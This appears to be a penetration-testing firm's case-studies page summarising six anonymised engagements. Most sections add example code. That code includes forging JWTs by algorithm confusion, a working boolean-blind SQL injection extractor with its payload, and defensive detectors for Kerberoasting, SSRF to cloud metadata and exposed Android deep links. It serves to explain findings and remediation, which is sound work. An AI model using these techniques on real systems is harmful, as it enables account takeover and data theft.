Case Studies

Anonymised summaries of real client engagements. We let the findings speak for themselves.

Recent Engagements

All case studies are anonymised and published with client consent.

🏦 Financial Services · Critical Findings

Core Banking Platform — Authentication Bypass & Privilege Escalation

Challenge: A Tier-1 bank needed a pre-launch security assessment of their new customer-facing banking portal before going live with 2M+ customers.

Result: Discovered a critical authentication bypass allowing account takeover via a JWT algorithm confusion attack (the verifier trusted the algorithm named in the token header), plus an IDOR that exposed other customers' transaction histories.

3 critical findings · 14 total vulnerabilities · 2-week engagement
Tags: Web App, API, Auth
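The algorithm confusion finding above, as an added illustration (this is example code written for this page, not the client's portal code or our tooling). It models the two attacker-reachable paths of a verifier that lets the token header pick the algorithm: `alg: none`, and HS256 signed with the server's published RS256 public key, which the buggy verifier then uses as an HMAC secret. The PEM string, the server secret and the claims are constructed placeholders; RSA verification itself is not modelled, so the hardened verifier only implements the HS256 path and rejects everything else.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed stand-ins, not real key material. PUBLIC_PEM is the kind of
# RS256 public key a server publishes (so any attacker can read it);
# SERVER_SECRET is the private HMAC key a correctly configured HS256
# deployment would hold.
PUBLIC_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
              b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
              b"-----END PUBLIC KEY-----\n")
SERVER_SECRET = b"constructed-server-hmac-secret-do-not-reuse"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_jwt(header: dict, payload: dict, key: Optional[bytes]) -> str:
    """Build a compact JWT. key=None yields an unsigned token (for alg 'none')."""
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    if key is None:
        return signing_input + "."
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def _parts(token: str):
    head_b64, body_b64, sig_b64 = token.split(".")  # ValueError if not 3 segments
    return head_b64, body_b64, sig_b64, json.loads(b64url_decode(head_b64))


def verify_vulnerable(token: str, key: bytes) -> Optional[dict]:
    """The bug: the token's own header chooses the algorithm. 'key' is whatever
    the deployment loaded; for an RS256 service that is the public PEM, which
    silently becomes the HMAC secret the moment the header says HS256."""
    try:
        head_b64, body_b64, sig_b64, header = _parts(token)
    except ValueError:
        return None
    alg = header.get("alg")
    if alg == "none":                        # unsigned token accepted as-is
        return json.loads(b64url_decode(body_b64))
    if alg == "HS256":
        expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(body_b64))
        return None
    # A real RS256 branch would call an RSA verify here; RSA is not modelled.
    return None


def verify_hardened(token: str, pinned_alg: str, key: bytes) -> Optional[dict]:
    """The fix: the server pins the algorithm and only checks that the header
    agrees; 'none' can never be pinned. Only the HS256 path is implemented."""
    try:
        head_b64, body_b64, sig_b64, header = _parts(token)
    except ValueError:
        return None
    if pinned_alg == "none" or header.get("alg") != pinned_alg:
        return None
    if pinned_alg != "HS256":
        return None                          # RS256 verification omitted here
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(body_b64))


def demo() -> dict:
    """Forge the two confusion tokens and compare both verifiers."""
    admin = {"sub": "victim-account", "role": "admin"}          # constructed claims
    forged_none = make_jwt({"alg": "none", "typ": "JWT"}, admin, None)
    forged_hs = make_jwt({"alg": "HS256", "typ": "JWT"}, admin, PUBLIC_PEM)
    legit = make_jwt({"alg": "HS256", "typ": "JWT"}, {"sub": "alice"}, SERVER_SECRET)
    return {
        "vulnerable_accepts_alg_none": verify_vulnerable(forged_none, PUBLIC_PEM) == admin,
        "vulnerable_accepts_pubkey_as_hmac_secret": verify_vulnerable(forged_hs, PUBLIC_PEM) == admin,
        "hardened_rejects_alg_none": verify_hardened(forged_none, "RS256", PUBLIC_PEM) is None,
        "hardened_rejects_pubkey_as_hmac_secret": verify_hardened(forged_hs, "RS256", PUBLIC_PEM) is None,
        "hardened_accepts_legitimate_token": verify_hardened(legit, "HS256", SERVER_SECRET) == {"sub": "alice"},
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The remediation in production is the same shape as `verify_hardened`: pass the expected algorithm to the JWT library explicitly (most libraries take an `algorithms` allow-list) and keep RSA and HMAC keys in separate, typed configuration so a public key can never be handed to an HMAC routine.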
🏥 Healthcare · HIPAA Context

Hospital Network — Active Directory Compromise in 4 Hours

Challenge: A regional hospital group with 12 sites needed to validate their internal network security posture ahead of a HIPAA audit.

Result: Achieved Domain Admin in under 4 hours via SMB relay → Kerberoasting → unconstrained delegation abuse. Patient data was accessible from 3 different attack paths.

4h to Domain Admin · 3 attack paths found · 3-week engagement
Tags: Network, Active Directory, HIPAA
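Two defender-side checks for the middle and end of the chain described above, added here as an example and not taken from the engagement or the client's SIEM. The first flags Kerberoasting from Windows Security event 4769 (service ticket requests): one requester pulling RC4-HMAC (encryption type 0x17) tickets for several distinct SPNs in a short window. The second lists non-DC computer objects carrying the TRUSTED_FOR_DELEGATION flag (unconstrained delegation). The event records and directory objects are constructed samples; the field names are simplified from the real event and LDAP attributes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

UAC_TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit for unconstrained delegation
DC_PRIMARY_GROUP_ID = 516              # Domain Controllers: they hold the flag by design

# Constructed sample of event 4769 reduced to the fields used here (real events
# carry them as TargetUserName, ServiceName, TicketEncryptionType, IpAddress).
SAMPLE_4769 = [
    {"ts": "2024-05-01T09:00:01", "account": "jsmith@CORP.LOCAL",  "service": "MSSQLSvc/db01.corp.local:1433", "etype": "0x12", "src_ip": "10.0.5.12"},
    {"ts": "2024-05-01T09:00:07", "account": "ahmed@CORP.LOCAL",   "service": "HTTP/intranet.corp.local",      "etype": "0x17", "src_ip": "10.0.5.40"},
    {"ts": "2024-05-01T09:14:02", "account": "nurse17@CORP.LOCAL", "service": "MSSQLSvc/db01.corp.local:1433", "etype": "0x17", "src_ip": "10.0.7.88"},
    {"ts": "2024-05-01T09:14:03", "account": "nurse17@CORP.LOCAL", "service": "HTTP/intranet.corp.local",      "etype": "0x17", "src_ip": "10.0.7.88"},
    {"ts": "2024-05-01T09:14:03", "account": "nurse17@CORP.LOCAL", "service": "CIFS/files01.corp.local",       "etype": "0x17", "src_ip": "10.0.7.88"},
    {"ts": "2024-05-01T09:14:05", "account": "nurse17@CORP.LOCAL", "service": "MSSQLSvc/db02.corp.local:1433", "etype": "0x17", "src_ip": "10.0.7.88"},
    {"ts": "2024-05-01T09:30:00", "account": "WS102$@CORP.LOCAL",  "service": "krbtgt/CORP.LOCAL",             "etype": "0x12", "src_ip": "10.0.7.90"},
]

# Constructed computer objects: uac = userAccountControl, plus primaryGroupID.
SAMPLE_COMPUTERS = [
    {"name": "DC01$",  "uac": 0x80000 | 0x2000, "primaryGroupID": 516},  # SERVER_TRUST_ACCOUNT, expected on a DC
    {"name": "WEB03$", "uac": 0x80000 | 0x1000, "primaryGroupID": 515},  # member server with unconstrained delegation
    {"name": "WS102$", "uac": 0x1000,           "primaryGroupID": 515},  # plain workstation
]


def kerberoast_candidates(events, window_minutes=5, min_distinct_spns=3):
    """Return one alert per (account, source IP) that requested RC4 service
    tickets for at least min_distinct_spns different SPNs inside the window."""
    by_requester = defaultdict(list)
    for e in events:
        if e["etype"].lower() != "0x17":           # only RC4-HMAC requests are interesting
            continue
        by_requester[(e["account"], e["src_ip"])].append(
            (datetime.fromisoformat(e["ts"]), e["service"]))
    alerts = []
    for (account, src_ip), reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):      # sliding window from each request
            spns = {svc for t, svc in reqs[i:] if t - start <= timedelta(minutes=window_minutes)}
            if len(spns) >= min_distinct_spns:
                alerts.append({"account": account, "src_ip": src_ip,
                               "window_start": start.isoformat(), "spns": sorted(spns)})
                break
    return alerts


def unconstrained_delegation_hosts(records):
    """Computer objects with TRUSTED_FOR_DELEGATION that are not domain controllers.
    Equivalent LDAP filter: (&(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(primaryGroupID=516)))"""
    return [r["name"] for r in records
            if r["uac"] & UAC_TRUSTED_FOR_DELEGATION and r["primaryGroupID"] != DC_PRIMARY_GROUP_ID]


if __name__ == "__main__":
    for a in kerberoast_candidates(SAMPLE_4769):
        print("possible Kerberoasting:", a)
    print("unconstrained delegation on:", unconstrained_delegation_hosts(SAMPLE_COMPUTERS))
```

Tune the window and threshold to the estate: legacy applications that still negotiate RC4 will show up as steady single-SPN requests rather than bursts, and a service account that legitimately needs delegation should be moved to constrained or resource-based delegation rather than left on the exception list.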
🛍️ E-Commerce · PCI DSS

E-Commerce Platform — Payment Data Exposure via SQLi

Challenge: A fast-growing e-commerce company processing 50K+ orders/month needed a PCI DSS-aligned web application penetration test.

Result: Found a blind SQL injection in the product search API, exploitable to extract the full customer database, including hashed payment card data. Remediated within 48 hours.

1 critical SQLi found · 280K records at risk · 48h time to remediate
Tags: Web App, PCI DSS, SQLi
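How a boolean-based blind injection turns a search endpoint into a database read, and what the parameterised fix changes: an added example built on an in-memory SQLite database, not the client's application or data. The product and customer rows, the hashed test card number and the function names are constructed; in an engagement the `search` callable would be an HTTP request to the API and the oracle would be the presence or absence of results in the response.

```python
import hashlib
import sqlite3

# Constructed: the SHA-256 of the Visa test PAN stands in for a stored card hash.
CARD_HASH = hashlib.sha256(b"4111111111111111").hexdigest()


def build_db() -> sqlite3.Connection:
    """Tiny constructed schema: a searchable product table and a customer table
    the search endpoint has no business reaching."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, active INTEGER)")
    conn.execute("CREATE TABLE customers(id INTEGER PRIMARY KEY, email TEXT, card_hash TEXT)")
    conn.executemany("INSERT INTO products(name, active) VALUES (?, ?)",
                     [("red shoes", 1), ("blue shoes", 1), ("old hat", 0)])
    conn.execute("INSERT INTO customers(email, card_hash) VALUES (?, ?)",
                 ("alice@example.com", CARD_HASH))
    conn.commit()
    return conn


def search_vulnerable(conn, term: str) -> list:
    """Vulnerable: the search term is spliced into the SQL text."""
    sql = f"SELECT name FROM products WHERE active = 1 AND name LIKE '%{term}%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, term: str) -> list:
    """Fixed: the term travels as a bound parameter, so it can only ever be data."""
    sql = "SELECT name FROM products WHERE active = 1 AND name LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


def extract_via_blind(conn, search, column="card_hash", table="customers", length=64) -> str:
    """Boolean-based blind extraction. Each request asks one yes/no question
    (does the search return any rows?) about one character of the target value.
    Against the fixed endpoint no guess ever matches and the result is empty."""
    alphabet = "0123456789abcdef"   # the target is a hex digest; widen for other columns
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            # Closes the LIKE string, appends the oracle condition, comments out the rest.
            payload = f"' AND substr((SELECT {column} FROM {table} LIMIT 1),{pos},1)='{ch}' -- "
            if search(conn, payload):
                recovered += ch
                break
        else:
            return recovered        # no character matched: nothing more to learn
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable endpoint leaks:", extract_via_blind(db, search_vulnerable) == CARD_HASH)
    print("fixed endpoint leaks:", extract_via_blind(db, search_fixed) != "")
```

Sixteen guesses per character is the naive version; a real extraction halves the search with comparison operators and can fall back to time-based conditions when the response carries no visible difference. Note also why "hashed" card data is still a finding under PCI DSS: with the six-digit BIN known and the Luhn check digit fixed, an unsalted hash of a sixteen-digit PAN has roughly a billion candidates and is brute-forced offline in minutes.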
☁️ SaaS / Tech · Cloud

B2B SaaS — AWS Misconfiguration Exposes All Customer Data

Challenge: A Series B SaaS company needed a cloud security assessment before their enterprise sales motion required ISO 27001 compliance evidence.

Result: Discovered an S3 bucket with public ACLs containing all customer data exports, plus an EC2 metadata SSRF leading to IAM credential theft and cross-account access.

2 critical cloud findings · 100% data exposure risk · 1-week engagement
Tags: AWS, Cloud, IAM
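Three checks that would have surfaced or blocked the findings above, written for this page as an example rather than taken from the engagement tooling: a scan of a bucket ACL for the public grantee groups, an outbound-fetch guard that refuses link-local, loopback and private destinations (which is where the EC2 metadata service lives), and a test of an instance's metadata options for IMDSv2 enforcement. The ACL, instance metadata options and DNS answers are constructed to match the shapes the AWS API returns; no network call is made.

```python
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

# Grantee URIs AWS uses for "everyone" and "any AWS account" in bucket ACLs.
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

# Constructed GetBucketAcl-shaped response: owner plus a world-readable grant.
SAMPLE_ACL = {
    "Owner": {"ID": "constructed-owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-canonical-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    ],
}

# Constructed DNS answers so the SSRF guard can be exercised offline.
CONSTRUCTED_DNS = {
    "api.partner.example": ["93.184.216.34"],        # an ordinary public address
    "lookalike.example": ["169.254.169.254"],        # attacker-controlled name pointing at IMDS
}


def public_grants(acl: dict) -> list:
    """Grants that expose a bucket to anyone on the internet or to any AWS account."""
    return [{"uri": g["Grantee"]["URI"], "permission": g["Permission"]}
            for g in acl.get("Grants", [])
            if g["Grantee"].get("Type") == "Group" and g["Grantee"].get("URI") in PUBLIC_GRANTEE_URIS]


def _system_resolve(host: str) -> List[str]:
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]


def is_safe_fetch_target(url: str, resolve: Callable[[str], List[str]] = _system_resolve) -> bool:
    """Allow only http(s) URLs whose every resolved address is globally routable.
    That excludes 169.254.169.254 and fd00:ec2::254 (IMDS), loopback, RFC 1918
    and other reserved ranges, whether given literally or behind a hostname."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]          # literal IP (v4 or bracketed v6)
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
        except (OSError, KeyError, ValueError):
            return False                                         # unresolvable: fail closed
    return bool(addrs) and all(a.is_global for a in addrs)


def imdsv2_enforced(metadata_options: dict) -> bool:
    """True when the instance's MetadataOptions require session tokens (IMDSv2),
    which defeats the plain GET an SSRF primitive can usually issue."""
    return metadata_options.get("HttpTokens") == "required"


def demo() -> dict:
    resolve = lambda host: CONSTRUCTED_DNS[host]
    return {
        "public_grants": public_grants(SAMPLE_ACL),
        "blocks_imds_v4": not is_safe_fetch_target("http://169.254.169.254/latest/meta-data/iam/security-credentials/", resolve),
        "blocks_imds_v6": not is_safe_fetch_target("http://[fd00:ec2::254]/latest/meta-data/", resolve),
        "blocks_name_resolving_to_imds": not is_safe_fetch_target("http://lookalike.example/x", resolve),
        "blocks_private": not is_safe_fetch_target("https://10.0.0.5/internal", resolve),
        "allows_public": is_safe_fetch_target("https://api.partner.example/v1/webhook", resolve),
        "imdsv2_enforced": imdsv2_enforced({"HttpTokens": "required", "HttpEndpoint": "enabled", "HttpPutResponseHopLimit": 1}),
        "imdsv1_still_allowed": not imdsv2_enforced({"HttpTokens": "optional", "HttpEndpoint": "enabled"}),
    }


if __name__ == "__main__":
    for check, value in demo().items():
        print(f"{check}: {value}")
```

The fetch guard must also be applied after every redirect and must use the addresses it actually connects to, otherwise a DNS answer that changes between the check and the connection (rebinding) gets around it. The matching remediation on the instance side is `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`, and on the bucket side S3 Block Public Access at the account level so that a stray ACL cannot take effect.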
🏛️ Government · Red Team

Government Agency — Full Red Team: Physical + Digital Breach

Challenge: A government agency requested a full-scope red team operation to test their entire security programme — including physical controls, staff awareness, and digital defences.

Result: Physical entry by tailgating; a USB drop gave a network foothold; a spear-phishing email compromised a C-suite account. Full kill chain in 6 days with zero detection by the SOC.

6 days to full compromise · 0 SOC alerts raised · 4-week engagement
Tags: Red Team, Physical, Phishing
📱 FinTech · Mobile

FinTech App — Insecure Storage & Biometric Bypass

Challenge: A FinTech startup needed a mobile security assessment of their iOS and Android investment app before launch to a regulated market.

Result: Found authentication tokens stored in plaintext in SharedPreferences (Android), a biometric authentication bypass, and an unprotected deep link that disclosed account balances without authentication.

2 critical findings · 9 total vulnerabilities · 10-day engagement
Tags: iOS, Android, MASVS
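A triage step for the deep-link finding above, added as an example (not the client's app or our assessment tooling): list every activity in an AndroidManifest.xml that registers a BROWSABLE intent filter with a data URI, which is the set of entry points any app or web page can open, and note whether a permission gates it. The manifest below is constructed to resemble the finding; the real check for whether the handler enforces authentication still has to be done against the activity's code or by firing the link on an unauthenticated device.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest fragment; package and activity names are placeholders.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.invest">
  <application android:label="Invest">
    <activity android:name=".BalanceActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="investapp" android:host="balance"/>
      </intent-filter>
    </activity>
    <activity android:name=".LoginActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="false"/>
  </application>
</manifest>"""


def _attr(element, name):
    """Read an android:-namespaced attribute."""
    return element.get(f"{{{ANDROID_NS}}}{name}")


def deep_link_entry_points(manifest_xml: str) -> list:
    """Activities reachable through a browsable deep link, with the URIs they
    accept, whether they are exported, and any permission an opener must hold."""
    root = ET.fromstring(manifest_xml)
    found = []
    for activity in root.iter("activity"):
        for intent_filter in activity.findall("intent-filter"):
            categories = {_attr(c, "name") for c in intent_filter.findall("category")}
            data = intent_filter.findall("data")
            if "android.intent.category.BROWSABLE" not in categories or not data:
                continue
            exported = _attr(activity, "exported")
            found.append({
                "activity": _attr(activity, "name"),
                "links": [f"{_attr(d, 'scheme')}://{_attr(d, 'host') or ''}" for d in data],
                # An activity with an intent filter is exported unless it says otherwise.
                "exported": exported != "false",
                "permission": _attr(activity, "permission"),
            })
    return found


def unguarded_deep_links(manifest_xml: str) -> list:
    """The subset worth testing unauthenticated: exported and not permission-gated."""
    return [e for e in deep_link_entry_points(manifest_xml) if e["exported"] and not e["permission"]]


if __name__ == "__main__":
    for entry in unguarded_deep_links(SAMPLE_MANIFEST):
        print("test without a session:", entry["activity"], entry["links"])
```

Each entry this returns should be exercised with a fresh install and no stored session (`adb shell am start -a android.intent.action.VIEW -d investapp://balance`, with the URI taken from the output); a screen that renders account data before the login flow has completed is the finding described above.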

Become Our Next Success Story

Every organisation has vulnerabilities. The question is whether you find them first or an attacker does.